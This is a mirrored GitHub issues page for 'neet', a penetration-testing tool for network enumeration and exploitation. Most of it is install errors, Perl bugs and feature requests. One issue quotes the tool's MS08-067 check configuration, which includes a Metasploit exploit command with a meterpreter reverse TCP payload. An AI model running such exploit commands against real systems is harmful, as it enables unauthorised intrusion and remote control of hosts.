GithubHelp home page GithubHelp logo

jonnyhightower / neet Goto Github PK

View Code? Open in Web Editor NEW
168.0 168.0 31.0 33.29 MB

Neet - Network Enumeration and Exploitation Tool

License: GNU General Public License v3.0

JavaScript 0.01% CSS 0.96% Shell 1.58% Perl 32.31% HTML 62.47% Perl 6 2.67%

neet's People

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

neet's Issues

Error installing on Kali

Hi,

I'm getting the following error while installing on Kali 2 (rolling):
Can't locate checkdeps.pm in @inc (you may need to install the checkdeps module) (@inc contains: /etc/perl /usr/local/lib/i386-linux-gnu/perl/5.24.1 /usr/local/share/perl/5.24.1 /usr/lib/i386-linux-gnu/perl5/5.24 /usr/share/perl5 /usr/lib/i386-linux-gnu/perl/5.24 /usr/share/perl/5.24 /usr/local/lib/site_perl /usr/lib/i386-linux-gnu/perl-base) at ./checkdeps.pl line 26.
BEGIN failed--compilation aborted at ./checkdeps.pl line 26.

I'm not a Perl whiz, but I see that the checkdeps.pm is on the same directory as the checkdeps.pl, so I don't know why it's not finding it...

Any ideas?

Doesn't cope with spaces in directory names

If you start Neet in a directory path that contains a space character, Neet exits with the error "Couldn't create the control directory!". Need to check that all directory references are quoted where relevant.

Metasplopit Checks

I know you are porting to msfconsole instead of msfcli. My question was regarding some of your checks. For example. I can see here that you are checking for MS08-067 but it seems you're also executing the exploit. Does Neet automatically exploit everything is finds vulnerable?

[CHECK]
name MS08-067 Server
label [GSM-WinVA-MS08-067]
desc Windows Server Service Remote Path Canonicalization Stack Overflow
type Windows
enabled 1

msref MS08-067
cve CVE-2008-4250
bid 31876

check [BIN]/ms08-067_check.py -s -t HOST 2>/dev/null
vuln VULNERABLE
#notest XP|2003
notest XP

exarch 32-bit
extype metasploit
exmancmd exploit/windows/smb/ms08_067_netapi RHOST=HOST LHOST=[LOCAL] TARGET=0 LPORT=[LOCALPORT] PAYLOA
D=windows/patchupmeterpreter/reverse_tcp E

exautosafe 0
exmanusafe 0

Also, Can I change where the information gets outputted? As in instead of having the folder where I ran Neet from full of folders containing a specific scan, could I just tell it to create a directory and dump the results of a specific scan into that folder. This will be easer for organizational purposes.

Thank You

mainscan.pm

157 # Record interface information
158 my $if;
159 for my $line (/sbin/ifconfig -a){
160 if ($line =~ /^\w+\d+[.\d+]{0,}\s+Link[\s\S]+/){
161 $if=$line; $if =~ s/^(\w+\d+[.\d+]{0,})\s+Link[\s\S]+/$1/;
162 }
163 if ($line =~ /inet addr/){

On Debian the result of ifconfig is not the same, I had to replace line 163 to 'if ($line =~ /inet adr/){' to make it work.

ERROR: No configured network interfaces found. Exiting.

Hi, Jonney, after a successful installation of your tool on kali, it complains of not having a network interface configured with the following error code:
ERROR: No configured network interfaces found. Exiting.

Please what can i do to resolve this...

Feature Requests

  1. testssl.sh in the HTTPS/SSL modules
  2. Nmap RPC Grind in service discovery module

NEET-UPDATE RUN

Neet-update run but has the same error:

Can't call method "contains" on an undefined value at /opt/neet/core/Neet/MainScan.pm line 974.

Error while trying to scan a single host

I try to scan a single host both with "-I" option and without it. After "Starting Service Discovery" neet exit with error:
Can't call method "contains" on an undefined value at /opt/neet/core/Neet/MainScan.pm line 974..
OS: Debian 8

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.